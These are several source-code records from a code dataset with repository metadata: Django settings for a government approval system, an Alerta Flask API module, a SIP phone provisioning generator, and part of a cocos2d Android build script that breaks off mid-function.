# 'required_css_class': 'required-form-field',
# 'set_placeholder': False,
#}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': os.path.join(BASE_DIR, 'disturbance', 'cache'),
}
}
STATIC_ROOT=os.path.join(BASE_DIR, 'staticfiles_ds')
STATICFILES_DIRS.append(os.path.join(os.path.join(BASE_DIR, 'disturbance', 'static')))
DEV_STATIC = env('DEV_STATIC',False)
DEV_STATIC_URL = env('DEV_STATIC_URL')
if DEV_STATIC and not DEV_STATIC_URL:
raise ImproperlyConfigured('If running in DEV_STATIC, DEV_STATIC_URL has to be set')
DATA_UPLOAD_MAX_NUMBER_FIELDS = None
# Department details
SYSTEM_NAME = env('SYSTEM_NAME', 'Disturbance Approval System')
APIARY_SYSTEM_NAME = env('APIARY_SYSTEM_NAME', 'Apiary System')
SYSTEM_NAME_SHORT = env('SYSTEM_NAME_SHORT', 'DAS')
SITE_PREFIX = env('SITE_PREFIX')
SITE_DOMAIN = env('SITE_DOMAIN')
SUPPORT_EMAIL = env('SUPPORT_EMAIL', SYSTEM_NAME_SHORT.lower() + '@' + SITE_DOMAIN).lower()
APIARY_SUPPORT_EMAIL = env('APIARY_SUPPORT_EMAIL', SUPPORT_EMAIL).lower()
DEP_URL = env('DEP_URL','www.' + SITE_DOMAIN)
DEP_PHONE = env('DEP_PHONE','(08) 9219 9000')
DEP_PHONE_SUPPORT = env('DEP_PHONE_SUPPORT','(08) 9219 9000')
DEP_FAX = env('DEP_FAX','(08) 9423 8242')
DEP_POSTAL = env('DEP_POSTAL','Locked Bag 104, Bentley Delivery Centre, Western Australia 6983')
DEP_NAME = env('DEP_NAME','Department of Biodiversity, Conservation and Attractions')
DEP_NAME_SHORT = env('DEP_NAME_SHORT','DBCA')
SITE_URL = env('SITE_URL', 'https://' + '.'.join([SITE_PREFIX, SITE_DOMAIN]).strip('.'))
PUBLIC_URL=env('PUBLIC_URL', SITE_URL)
EMAIL_FROM = env('EMAIL_FROM', 'no-reply@' + SITE_DOMAIN).lower()
DEFAULT_FROM_EMAIL = env('DEFAULT_FROM_EMAIL', 'no-reply@' + SITE_DOMAIN).lower()
ADMIN_GROUP = env('ADMIN_GROUP', 'Disturbance Admin')
APIARY_ADMIN_GROUP = 'Apiary Admin'
DAS_APIARY_ADMIN_GROUP = 'DAS-Apiary Admin'
APIARY_PAYMENTS_OFFICERS_GROUP = 'Apiary Payments Officers'
APPROVED_EXTERNAL_USERS_GROUP = env('APPROVED_EXTERNAL_USERS_GROUP', 'Disturbance Approved External Users')
CRON_EMAIL = env('CRON_EMAIL', 'cron@' + SITE_DOMAIN).lower()
TENURE_SECTION = env('TENURE_SECTION', None)
ASSESSMENT_REMINDER_DAYS = env('ASSESSMENT_REMINDER_DAYS', 15)
OSCAR_BASKET_COOKIE_OPEN = 'das_basket'
PAYMENT_SYSTEM_ID = env('PAYMENT_SYSTEM_ID', 'S517')
PS_PAYMENT_SYSTEM_ID = PAYMENT_SYSTEM_ID
PAYMENT_SYSTEM_PREFIX = env('PAYMENT_SYSTEM_PREFIX', PAYMENT_SYSTEM_ID.replace('S','0')) # '0517'
os.environ['LEDGER_PRODUCT_CUSTOM_FIELDS'] = "('ledger_description','quantity','price_incl_tax','price_excl_tax','oracle_code')"
APIARY_URL = env('APIARY_URL', [])
CRON_NOTIFICATION_EMAIL = env('CRON_NOTIFICATION_EMAIL', NOTIFICATION_EMAIL).lower()
BASE_URL=env('BASE_URL')
CKEDITOR_CONFIGS = {
'default': {
'toolbar': 'full',
'height': 300,
#'width': 300,
'width': '100%',
},
'awesome_ckeditor': {
'toolbar': 'Basic',
},
}
BUILD_TAG = env('BUILD_TAG', hashlib.md5(os.urandom(32)).hexdigest()) # URL of the Dev app.js served by webpack & express
DEV_APP_BUILD_URL = env('DEV_APP_BUILD_URL') # URL of the Dev app.js served by webpack & express
GEOCODING_ADDRESS_SEARCH_TOKEN = env('GEOCODING_ADDRESS_SEARCH_TOKEN', 'ACCESS_TOKEN_NOT_FOUND')
RESTRICTED_RADIUS = 3000 # unit: [m]
DBCA_ABN = '38 052 249 024'
if env('CONSOLE_EMAIL_BACKEND', False):
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
SITE_STATUS_DRAFT = 'draft'
SITE_STATUS_PENDING = 'pending'
SITE_STATUS_APPROVED = 'approved'
SITE_STATUS_DENIED = 'denied'
SITE_STATUS_CURRENT = 'current'
SITE_STATUS_NOT_TO_BE_REISSUED = 'not_to_be_reissued'
SITE_STATUS_SUSPENDED = 'suspended'
SITE_STATUS_TRANSFERRED = 'transferred'
SITE_STATUS_VACANT = 'vacant'
SITE_STATUS_DISCARDED = 'discarded'
BASE_EMAIL_TEXT = ''
BASE_EMAIL_HTML = ''
# This is either 'das'/'apiary'
# default: 'das'
# This value is determined at the middleware, DomainDetectMiddleware by where the request comes from
DOMAIN_DETECTED = 'das'
HTTP_HOST_FOR_TEST = 'localhost:8071'
# Additional logging for commercialoperator
LOGGING['loggers']['disturbance'] = {
'handlers': ['file'],
'level': 'INFO'
}
#APPLICATION_TYPES_SQL='''
# SELECT name, name FROM disturbance_applicationtypechoice
# WHERE archive_date IS NULL OR archive_date > now()
# '''
#from django.db import connection
#def run_select_sql(sql):
# try:
# with connection.cursor() as cursor:
# cursor.execute(sql)
# row = cursor.fetchall()
# return row
# except:
# return []
| 36.462963 | 128 | 0.734002 | from django.core.exceptions import ImproperlyConfigured
import os, hashlib
import confy
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
confy.read_environment_file(BASE_DIR+"/.env")
os.environ.setdefault("BASE_DIR", BASE_DIR)
from ledger.settings_base import *
ROOT_URLCONF = 'disturbance.urls'
SITE_ID = 1
DEPT_DOMAINS = env('DEPT_DOMAINS', ['dpaw.wa.gov.au', 'dbca.wa.gov.au'])
SUPERVISOR_STOP_CMD = env('SUPERVISOR_STOP_CMD')
SYSTEM_MAINTENANCE_WARNING = env('SYSTEM_MAINTENANCE_WARNING', 24) # hours
DISABLE_EMAIL = env('DISABLE_EMAIL', False)
MEDIA_APP_DIR = env('MEDIA_APP_DIR', 'das')
MEDIA_APIARY_DIR = env('MEDIA_APIARY_DIR', 'apiary')
SPATIAL_DATA_DIR = env('SPATIAL_DATA_DIR', 'spatial_data')
ANNUAL_RENTAL_FEE_GST_EXEMPT = True
INSTALLED_APPS += [
'reversion_compare',
'bootstrap3',
'disturbance',
'disturbance.components.main',
'disturbance.components.organisations',
'disturbance.components.users',
'disturbance.components.proposals',
'disturbance.components.approvals',
'disturbance.components.compliances',
'disturbance.components.das_payments',
'taggit',
'rest_framework',
'rest_framework_datatables',
'rest_framework_gis',
'reset_migrations',
'ckeditor',
'smart_selects',
]
ADD_REVERSION_ADMIN=True
# maximum number of days allowed for a booking
WSGI_APPLICATION = 'disturbance.wsgi.application'
'''REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'disturbance.perms.OfficerPermission',
)
}'''
#REST_FRAMEWORK = {
# 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
# #'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
# 'PAGE_SIZE': 5
#}
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
'rest_framework_datatables.renderers.DatatablesRenderer',
),
#'DEFAULT_FILTER_BACKENDS': (
# 'rest_framework_datatables.filters.DatatablesFilterBackend',
#),
#'DEFAULT_PAGINATION_CLASS': 'rest_framework_datatables.pagination.DatatablesPageNumberPagination',
#'PAGE_SIZE': 20,
}
USE_DJANGO_JQUERY= True
# JQUERY_URL = True
MIDDLEWARE_CLASSES += [
'disturbance.middleware.BookingTimerMiddleware',
'disturbance.middleware.FirstTimeNagScreenMiddleware',
'disturbance.middleware.RevisionOverrideMiddleware',
'disturbance.middleware.DomainDetectMiddleware',
]
TEMPLATES[0]['DIRS'].append(os.path.join(BASE_DIR, 'disturbance', 'templates'))
TEMPLATES[0]['DIRS'].append(os.path.join(BASE_DIR, 'disturbance','components','organisations', 'templates'))
TEMPLATES[0]['DIRS'].append(os.path.join(BASE_DIR, 'disturbance','components','emails', 'templates'))
TEMPLATES[0]['OPTIONS']['context_processors'].append('disturbance.context_processors.apiary_url')
del BOOTSTRAP3['css_url']
#BOOTSTRAP3 = {
# 'jquery_url': '//static.dpaw.wa.gov.au/static/libs/jquery/2.2.1/jquery.min.js',
# 'base_url': '//static.dpaw.wa.gov.au/static/libs/twitter-bootstrap/3.3.6/',
# 'css_url': None,
# 'theme_url': None,
# 'javascript_url': None,
# 'javascript_in_head': False,
# 'include_jquery': False,
# 'required_css_class': 'required-form-field',
# 'set_placeholder': False,
#}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': os.path.join(BASE_DIR, 'disturbance', 'cache'),
}
}
STATIC_ROOT=os.path.join(BASE_DIR, 'staticfiles_ds')
STATICFILES_DIRS.append(os.path.join(os.path.join(BASE_DIR, 'disturbance', 'static')))
DEV_STATIC = env('DEV_STATIC',False)
DEV_STATIC_URL = env('DEV_STATIC_URL')
if DEV_STATIC and not DEV_STATIC_URL:
raise ImproperlyConfigured('If running in DEV_STATIC, DEV_STATIC_URL has to be set')
DATA_UPLOAD_MAX_NUMBER_FIELDS = None
# Department details
SYSTEM_NAME = env('SYSTEM_NAME', 'Disturbance Approval System')
APIARY_SYSTEM_NAME = env('APIARY_SYSTEM_NAME', 'Apiary System')
SYSTEM_NAME_SHORT = env('SYSTEM_NAME_SHORT', 'DAS')
SITE_PREFIX = env('SITE_PREFIX')
SITE_DOMAIN = env('SITE_DOMAIN')
SUPPORT_EMAIL = env('SUPPORT_EMAIL', SYSTEM_NAME_SHORT.lower() + '@' + SITE_DOMAIN).lower()
APIARY_SUPPORT_EMAIL = env('APIARY_SUPPORT_EMAIL', SUPPORT_EMAIL).lower()
DEP_URL = env('DEP_URL','www.' + SITE_DOMAIN)
DEP_PHONE = env('DEP_PHONE','(08) 9219 9000')
DEP_PHONE_SUPPORT = env('DEP_PHONE_SUPPORT','(08) 9219 9000')
DEP_FAX = env('DEP_FAX','(08) 9423 8242')
DEP_POSTAL = env('DEP_POSTAL','Locked Bag 104, Bentley Delivery Centre, Western Australia 6983')
DEP_NAME = env('DEP_NAME','Department of Biodiversity, Conservation and Attractions')
DEP_NAME_SHORT = env('DEP_NAME_SHORT','DBCA')
SITE_URL = env('SITE_URL', 'https://' + '.'.join([SITE_PREFIX, SITE_DOMAIN]).strip('.'))
PUBLIC_URL=env('PUBLIC_URL', SITE_URL)
EMAIL_FROM = env('EMAIL_FROM', 'no-reply@' + SITE_DOMAIN).lower()
DEFAULT_FROM_EMAIL = env('DEFAULT_FROM_EMAIL', 'no-reply@' + SITE_DOMAIN).lower()
ADMIN_GROUP = env('ADMIN_GROUP', 'Disturbance Admin')
APIARY_ADMIN_GROUP = 'Apiary Admin'
DAS_APIARY_ADMIN_GROUP = 'DAS-Apiary Admin'
APIARY_PAYMENTS_OFFICERS_GROUP = 'Apiary Payments Officers'
APPROVED_EXTERNAL_USERS_GROUP = env('APPROVED_EXTERNAL_USERS_GROUP', 'Disturbance Approved External Users')
CRON_EMAIL = env('CRON_EMAIL', 'cron@' + SITE_DOMAIN).lower()
TENURE_SECTION = env('TENURE_SECTION', None)
ASSESSMENT_REMINDER_DAYS = env('ASSESSMENT_REMINDER_DAYS', 15)
OSCAR_BASKET_COOKIE_OPEN = 'das_basket'
PAYMENT_SYSTEM_ID = env('PAYMENT_SYSTEM_ID', 'S517')
PS_PAYMENT_SYSTEM_ID = PAYMENT_SYSTEM_ID
PAYMENT_SYSTEM_PREFIX = env('PAYMENT_SYSTEM_PREFIX', PAYMENT_SYSTEM_ID.replace('S','0')) # '0517'
os.environ['LEDGER_PRODUCT_CUSTOM_FIELDS'] = "('ledger_description','quantity','price_incl_tax','price_excl_tax','oracle_code')"
APIARY_URL = env('APIARY_URL', [])
CRON_NOTIFICATION_EMAIL = env('CRON_NOTIFICATION_EMAIL', NOTIFICATION_EMAIL).lower()
BASE_URL=env('BASE_URL')
CKEDITOR_CONFIGS = {
'default': {
'toolbar': 'full',
'height': 300,
#'width': 300,
'width': '100%',
},
'awesome_ckeditor': {
'toolbar': 'Basic',
},
}
BUILD_TAG = env('BUILD_TAG', hashlib.md5(os.urandom(32)).hexdigest()) # URL of the Dev app.js served by webpack & express
DEV_APP_BUILD_URL = env('DEV_APP_BUILD_URL') # URL of the Dev app.js served by webpack & express
GEOCODING_ADDRESS_SEARCH_TOKEN = env('GEOCODING_ADDRESS_SEARCH_TOKEN', 'ACCESS_TOKEN_NOT_FOUND')
RESTRICTED_RADIUS = 3000 # unit: [m]
DBCA_ABN = '38 052 249 024'
if env('CONSOLE_EMAIL_BACKEND', False):
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
SITE_STATUS_DRAFT = 'draft'
SITE_STATUS_PENDING = 'pending'
SITE_STATUS_APPROVED = 'approved'
SITE_STATUS_DENIED = 'denied'
SITE_STATUS_CURRENT = 'current'
SITE_STATUS_NOT_TO_BE_REISSUED = 'not_to_be_reissued'
SITE_STATUS_SUSPENDED = 'suspended'
SITE_STATUS_TRANSFERRED = 'transferred'
SITE_STATUS_VACANT = 'vacant'
SITE_STATUS_DISCARDED = 'discarded'
BASE_EMAIL_TEXT = ''
BASE_EMAIL_HTML = ''
# This is either 'das'/'apiary'
# default: 'das'
# This value is determined at the middleware, DomainDetectMiddleware by where the request comes from
DOMAIN_DETECTED = 'das'
HTTP_HOST_FOR_TEST = 'localhost:8071'
# Additional logging for commercialoperator
LOGGING['loggers']['disturbance'] = {
'handlers': ['file'],
'level': 'INFO'
}
#APPLICATION_TYPES_SQL='''
# SELECT name, name FROM disturbance_applicationtypechoice
# WHERE archive_date IS NULL OR archive_date > now()
# '''
#from django.db import connection
#def run_select_sql(sql):
# try:
# with connection.cursor() as cursor:
# cursor.execute(sql)
# row = cursor.fetchall()
# return row
# except:
# return []
| 0 | 0 | 0 |
f924ae02089b8d9b8047385bafaca4369a73ed8a | 99 | py | Python | django_auth/p_library/apps.py | bobruk76/D7 | f5167ac40d093d49a89c36b3465e5073e6530ed1 | [
"MIT"
] | null | null | null | django_auth/p_library/apps.py | bobruk76/D7 | f5167ac40d093d49a89c36b3465e5073e6530ed1 | [
"MIT"
] | 7 | 2021-04-08T21:29:04.000Z | 2022-01-13T03:05:35.000Z | django_auth/p_library/apps.py | bobruk76/D7 | f5167ac40d093d49a89c36b3465e5073e6530ed1 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
| 16.5 | 35 | 0.727273 | from django.apps import AppConfig
class OrmExampleConfig(AppConfig):
    """Django application configuration for the ``p_library`` (personal library) app."""
    # App label/module registered in INSTALLED_APPS.
    name = 'p_library'
| 0 | 37 | 25 |
871940d70a528cc5f3e9d07b3130d476a0ac2b28 | 1,928 | py | Python | provision/cg.py | mkosterin/snr_phones_autoprovision_config_generator | c21cf91fcebd5f17a59cf5f30faf2d0ca7fffcc3 | [
"MIT"
] | null | null | null | provision/cg.py | mkosterin/snr_phones_autoprovision_config_generator | c21cf91fcebd5f17a59cf5f30faf2d0ca7fffcc3 | [
"MIT"
] | null | null | null | provision/cg.py | mkosterin/snr_phones_autoprovision_config_generator | c21cf91fcebd5f17a59cf5f30faf2d0ca7fffcc3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import string
import random
from jinja2 import Template, Environment, FileSystemLoader
baseDir = "c:\\provision"
# which extension number we should start
start_ext = 821
extensionHeader = """#cid_number,transfer,mailbox,type,qualify,hasdirectory,call-limit,host,context,fullname,secret,hasvoicemail,vmsecret,email,delete,hassip,hasiax,dahdichan,hasmanager,nat,dtmfmode,hasagent,callwaiting,videosupport,transport,encryption,srtpcapable,disallow,allow,deny,permit,callgroup,pickupgroup"""
extensionFileName = baseDir + "\\" + "users_extensions.csv"
env = Environment(loader=FileSystemLoader(baseDir))
mac = open(baseDir + "\\" + "macs.txt")
extensionFile = open(extensionFileName, "w")
extensionFile.write(extensionHeader)
templateExtension = env.get_template("templ_extensions.csv.j2")
templateMac = env.get_template("templ.cfg.j2")
ext = start_ext
for line in mac:
data = {
"enable": "1",
"label": ext,
"displayname": ext,
"sipUsername": ext,
"authname": ext,
"sipPassword": password(),
"server": "192.168.1.1", #change it as you want
"webUser": "admin", #change it as you want
"webPassword": "admin" #change it as you want
}
extensionFile.write("\n" + templateExtension.render(**data))
autopFile = open(baseDir + "\\" + line[0:-1] + ".cfg", "w")
autopFile.write(templateMac.render(**data) + "\n")
autopFile.close()
ext = ext + 1
mac.close()
extensionFile.close()
| 32.677966 | 318 | 0.645747 | # -*- coding: utf-8 -*-
import string
import random
from jinja2 import Template, Environment, FileSystemLoader
def password():
    """Generate a random 10-character SIP password.

    The password is drawn from ASCII letters and digits and is guaranteed
    (by rejection sampling: draw again until the policy holds) to contain
    at least one lowercase letter, at least one uppercase letter and at
    least three digits — same policy as before.

    Returns:
        str: the generated 10-character password.
    """
    # These are credentials, so use the cryptographically secure ``secrets``
    # generator instead of ``random`` (which is predictable).
    import secrets
    alphabet = string.ascii_letters + string.digits
    while True:
        # Renamed local so it no longer shadows the function name itself.
        candidate = ''.join(secrets.choice(alphabet) for _ in range(10))
        if (any(c.islower() for c in candidate)
                and any(c.isupper() for c in candidate)
                and sum(c.isdigit() for c in candidate) >= 3):
            return candidate
# Auto-provisioning generator for SNR phones: for every MAC address listed in
# macs.txt it renders a per-phone .cfg file and appends one extension row to a
# FreePBX-style users_extensions.csv, using Jinja2 templates in baseDir.
baseDir = "c:\\provision"
# which extension number we should start
start_ext = 821
# CSV header expected by the PBX bulk-extension importer.
extensionHeader = """#cid_number,transfer,mailbox,type,qualify,hasdirectory,call-limit,host,context,fullname,secret,hasvoicemail,vmsecret,email,delete,hassip,hasiax,dahdichan,hasmanager,nat,dtmfmode,hasagent,callwaiting,videosupport,transport,encryption,srtpcapable,disallow,allow,deny,permit,callgroup,pickupgroup"""
extensionFileName = baseDir + "\\" + "users_extensions.csv"
# Jinja2 environment loads templates from the provisioning directory.
env = Environment(loader=FileSystemLoader(baseDir))
# macs.txt: one phone MAC address per line.
mac = open(baseDir + "\\" + "macs.txt")
extensionFile = open(extensionFileName, "w")
extensionFile.write(extensionHeader)
templateExtension = env.get_template("templ_extensions.csv.j2")
templateMac = env.get_template("templ.cfg.j2")
ext = start_ext
for line in mac:
    # One data record per phone; each phone gets a fresh random SIP password.
    data = {
        "enable": "1",
        "label": ext,
        "displayname": ext,
        "sipUsername": ext,
        "authname": ext,
        "sipPassword": password(),
        "server": "192.168.1.1", #change it as you want
        "webUser": "admin", #change it as you want
        "webPassword": "admin" #change it as you want
    }
    extensionFile.write("\n" + templateExtension.render(**data))
    # Per-phone config file named "<MAC>.cfg" (line[0:-1] strips the newline).
    autopFile = open(baseDir + "\\" + line[0:-1] + ".cfg", "w")
    autopFile.write(templateMac.render(**data) + "\n")
    autopFile.close()
    ext = ext + 1
mac.close()
extensionFile.close()
| 343 | 0 | 25 |
044676a8ff601efa4be0c7cc2f74a9175441a1bb | 1,352 | py | Python | alerta/views/__init__.py | smbambling/alerta | 1b3c3888b67ac4db48ef5eb9dcd704ac0c5aecb1 | [
"Apache-2.0"
] | 1,233 | 2017-11-01T00:29:12.000Z | 2022-03-29T04:13:09.000Z | alerta/views/__init__.py | smbambling/alerta | 1b3c3888b67ac4db48ef5eb9dcd704ac0c5aecb1 | [
"Apache-2.0"
] | 760 | 2017-10-27T20:33:41.000Z | 2022-03-28T17:01:41.000Z | alerta/views/__init__.py | smbambling/alerta | 1b3c3888b67ac4db48ef5eb9dcd704ac0c5aecb1 | [
"Apache-2.0"
] | 238 | 2017-11-02T14:58:15.000Z | 2022-03-29T03:59:20.000Z | from flask import Blueprint, current_app, jsonify, request
from alerta.app import custom_webhooks
from alerta.exceptions import ApiError
from alerta.utils.response import absolute_url
api = Blueprint('api', __name__)
from . import alerts, blackouts, config, customers, groups, heartbeats, keys, oembed, permissions, users # noqa isort:skip
try:
from . import bulk # noqa
except ImportError:
pass
@api.before_request
@api.route('/', methods=['OPTIONS', 'GET'])
@api.route('/_', methods=['GET'])
| 28.765957 | 133 | 0.642012 | from flask import Blueprint, current_app, jsonify, request
from alerta.app import custom_webhooks
from alerta.exceptions import ApiError
from alerta.utils.response import absolute_url
api = Blueprint('api', __name__)
from . import alerts, blackouts, config, customers, groups, heartbeats, keys, oembed, permissions, users # noqa isort:skip
try:
from . import bulk # noqa
except ImportError:
pass
@api.before_request
def before_request():
    """Reject any POST/PUT request whose body is not declared as JSON."""
    is_write_method = request.method in ('POST', 'PUT')
    if is_write_method and not request.is_json:
        raise ApiError("POST and PUT requests must set 'Content-type' to 'application/json'", 415)
@api.route('/', methods=['OPTIONS', 'GET'])
def index():
    """Describe the API: list every registered route and custom webhook."""
    core_links = [
        {
            'rel': rule.endpoint,
            'href': absolute_url(rule.rule),
            'method': ','.join(m for m in rule.methods if m not in ['HEAD', 'OPTIONS'])
        }
        for rule in current_app.url_map.iter_rules()
    ]
    webhook_links = [
        {
            'rel': rule.endpoint,
            'href': absolute_url(rule.rule),
            'method': ','.join(rule.methods)
        }
        for rule in custom_webhooks.iter_rules()
    ]
    links = core_links + webhook_links
    return jsonify(status='ok', uri=absolute_url(), data={'description': 'Alerta API'}, links=sorted(links, key=lambda k: k['href']))
@api.route('/_', methods=['GET'])
def debug():
    # Minimal liveness probe: always answers 200 with a plain "OK" body.
    return 'OK'
| 772 | 0 | 66 |
a3a6ca3d60b2fa60a87dfa7d07a083ca5ad28d60 | 19,506 | py | Python | tools/cocos2d-console/plugins/project_compile/build_android.py | kinzhang/cocos2d-js-v3.2 | 530c6fe1345aa31fbd94d0ec191071a6db23820d | [
"MIT"
] | null | null | null | tools/cocos2d-console/plugins/project_compile/build_android.py | kinzhang/cocos2d-js-v3.2 | 530c6fe1345aa31fbd94d0ec191071a6db23820d | [
"MIT"
] | null | null | null | tools/cocos2d-console/plugins/project_compile/build_android.py | kinzhang/cocos2d-js-v3.2 | 530c6fe1345aa31fbd94d0ec191071a6db23820d | [
"MIT"
] | null | null | null | #!/usr/bin/python
# build_native.py
# Build native codes
import sys
import os, os.path
import shutil
from optparse import OptionParser
import cocos
import cocos_project
import json
import re
from xml.dom import minidom
import project_compile
BUILD_CFIG_FILE="build-cfg.json"
| 39.889571 | 186 | 0.618886 | #!/usr/bin/python
# build_native.py
# Build native codes
import sys
import os, os.path
import shutil
from optparse import OptionParser
import cocos
import cocos_project
import json
import re
from xml.dom import minidom
import project_compile
BUILD_CFIG_FILE="build-cfg.json"
class AndroidBuilder(object):
    """Builds the Android target of a cocos project.

    Responsibilities: parse build-cfg.json, update the Android SDK project
    (and its library projects), run ndk-build for the native code, copy
    resources, and drive the ant build that produces (and signs) the APK.
    """
    # Keys recognised in build-cfg.json (see _parse_cfg).
    CFG_KEY_COPY_TO_ASSETS = "copy_to_assets"
    # NOTE(review): "ASSERTS" looks like a typo for "ASSETS", but the name is
    # part of the public constant surface, so it is kept as-is.
    CFG_KEY_MUST_COPY_TO_ASSERTS = "must_copy_to_assets"
    # APK-signing keys; when present they are migrated into ant.properties.
    CFG_KEY_STORE = "key_store"
    CFG_KEY_STORE_PASS = "key_store_pass"
    CFG_KEY_ALIAS = "alias"
    CFG_KEY_ALIAS_PASS = "alias_pass"
    def __init__(self, verbose, app_android_root, no_res, proj_obj):
        """Create a builder for the Android project at *app_android_root*.

        Args:
            verbose: when true, executed shell commands echo their output.
            app_android_root: path of the project's Android directory.
            no_res: when true, only the "must copy" resources are copied.
            proj_obj: the cocos_project.Project instance being built.
        """
        self._verbose = verbose
        self.app_android_root = app_android_root
        self._no_res = no_res
        self._project = proj_obj
        # ant.properties holds the APK signing settings (key.store, ...).
        self.ant_cfg_file = os.path.join(self.app_android_root, "ant.properties")
        # Load build-cfg.json (resources, NDK module paths, sign info).
        self._parse_cfg()
    def _run_cmd(self, command):
        # Run a shell command through the cocos runner, honouring verbosity.
        cocos.CMDRunner.run_cmd(command, self._verbose)
    def _parse_cfg(self):
        """Load build-cfg.json into instance state.

        Populates ``res_files`` (resources to copy into assets/),
        ``ndk_module_paths`` and the optional signing properties.  Any
        signing keys found are moved out of build-cfg.json into
        ant.properties and the JSON file is rewritten without them, so the
        secrets don't stay in the build config.

        Raises:
            cocos.CCPluginError: if the file is missing or not valid JSON.
        """
        self.cfg_path = os.path.join(self.app_android_root, BUILD_CFIG_FILE)
        try:
            f = open(self.cfg_path)
            cfg = json.load(f, encoding='utf8')
            f.close()
        except Exception:
            raise cocos.CCPluginError("Configuration file \"%s\" is not existed or broken!" % self.cfg_path)
        # "must copy" resources are always included; optional ones are
        # skipped when the user requested --no-res.
        if cfg.has_key(project_compile.CCPluginCompile.CFG_KEY_MUST_COPY_RESOURCES):
            if self._no_res:
                self.res_files = cfg[project_compile.CCPluginCompile.CFG_KEY_MUST_COPY_RESOURCES]
            else:
                self.res_files = cfg[project_compile.CCPluginCompile.CFG_KEY_MUST_COPY_RESOURCES] + cfg[project_compile.CCPluginCompile.CFG_KEY_COPY_RESOURCES]
        else:
            self.res_files = cfg[project_compile.CCPluginCompile.CFG_KEY_COPY_RESOURCES]
        self.ndk_module_paths = cfg['ndk_module_path']
        # get the properties for sign release apk
        move_cfg = {}
        self.key_store = None
        if cfg.has_key(AndroidBuilder.CFG_KEY_STORE):
            self.key_store = cfg[AndroidBuilder.CFG_KEY_STORE]
            move_cfg["key.store"] = self.key_store
            del cfg[AndroidBuilder.CFG_KEY_STORE]
        self.key_store_pass = None
        if cfg.has_key(AndroidBuilder.CFG_KEY_STORE_PASS):
            self.key_store_pass = cfg[AndroidBuilder.CFG_KEY_STORE_PASS]
            move_cfg["key.store.password"] = self.key_store_pass
            del cfg[AndroidBuilder.CFG_KEY_STORE_PASS]
        self.alias = None
        if cfg.has_key(AndroidBuilder.CFG_KEY_ALIAS):
            self.alias = cfg[AndroidBuilder.CFG_KEY_ALIAS]
            move_cfg["key.alias"] = self.alias
            del cfg[AndroidBuilder.CFG_KEY_ALIAS]
        self.alias_pass = None
        if cfg.has_key(AndroidBuilder.CFG_KEY_ALIAS_PASS):
            self.alias_pass = cfg[AndroidBuilder.CFG_KEY_ALIAS_PASS]
            move_cfg["key.alias.password"] = self.alias_pass
            del cfg[AndroidBuilder.CFG_KEY_ALIAS_PASS]
        if len(move_cfg) > 0:
            # move the config into ant.properties
            self._move_cfg(move_cfg)
            # Rewrite build-cfg.json without the signing keys just removed.
            with open(self.cfg_path, 'w') as outfile:
                json.dump(cfg, outfile, sort_keys = True, indent = 4)
                outfile.close()
def has_keystore_in_antprops(self):
keystore = None
try:
file_obj = open(self.ant_cfg_file)
pattern = re.compile(r"^key\.store=(.+)")
for line in file_obj:
str1 = line.replace(' ', '')
str2 = str1.replace('\t', '')
match = pattern.match(str2)
if match is not None:
keystore = match.group(1)
break
file_obj.close()
except:
pass
if keystore is None:
return False
else:
return True
def _write_ant_properties(self, cfg):
file_obj = open(self.ant_cfg_file, "a+")
for key in cfg.keys():
str_cfg = "%s=%s\n" % (key, cfg[key])
file_obj.write(str_cfg)
file_obj.close()
def _move_cfg(self, cfg):
if not self.has_keystore_in_antprops():
self._write_ant_properties(cfg)
def remove_c_libs(self, libs_dir):
for file_name in os.listdir(libs_dir):
lib_file = os.path.join(libs_dir, file_name)
if os.path.isfile(lib_file):
ext = os.path.splitext(lib_file)[1]
if ext == ".a" or ext == ".so":
os.remove(lib_file)
    def update_project(self, sdk_root, android_platform):
        """Run ``android update project`` on the app and its library projects.

        Args:
            sdk_root: root directory of the Android SDK.
            android_platform: requested "android-N" target, or None to let
                a suitable default be chosen.
        """
        sdk_tool_path = os.path.join(sdk_root, "tools", "android")
        app_android_root = self.app_android_root
        # check the android platform
        target_str = self.check_android_platform(sdk_root, android_platform, app_android_root, False)
        # update project
        command = "%s update project -t %s -p %s" % (cocos.CMDRunner.convert_path_to_cmd(sdk_tool_path), target_str, app_android_root)
        self._run_cmd(command)
        # update lib-projects
        self.update_lib_projects(sdk_root, sdk_tool_path, android_platform)
    def get_toolchain_version(self, ndk_root, compile_obj):
        """Pick the GCC toolchain version ("4.8" or "4.9") for ndk-build.

        Parses ``RELEASE.TXT`` in *ndk_root*; NDK r10c or newer selects 4.9,
        older (or unparseable) releases fall back to 4.8 and queue warnings
        on *compile_obj* about known crashes with the older toolchain.
        """
        ret_version = "4.8"
        version_file_path = os.path.join(ndk_root, "RELEASE.TXT")
        try:
            versionFile = open(version_file_path)
            lines = versionFile.readlines()
            versionFile.close()
            version_num = None
            version_char = None
            # RELEASE.TXT looks like "r10c"; capture the number and the letter.
            pattern = r'^[a-zA-Z]+(\d+)(\w)'
            for line in lines:
                str_line = line.lstrip()
                match = re.match(pattern, str_line)
                if match:
                    version_num = int(match.group(1))
                    version_char = match.group(2)
                    break
            if version_num is None:
                cocos.Logging.warning("Parse NDK version from file %s failed." % version_file_path)
            else:
                version_char = version_char.lower()
                # NOTE(review): cmp() is Python-2 only; this needs replacing
                # (e.g. version_char >= 'c') if this file moves to Python 3.
                if version_num > 10 or (version_num == 10 and cmp(version_char, 'c') >= 0):
                    ret_version = "4.9"
                else:
                    compile_obj.add_warning_at_end(
                        '''The NDK version is not r10c or above.
Your application may crash or freeze on Android L(5.0) when using BMFont and HttpClient.
For More information:
https://github.com/cocos2d/cocos2d-x/issues/9114
https://github.com/cocos2d/cocos2d-x/issues/9138\n''')
        except:
            # NOTE(review): bare except — any failure (missing file, parse
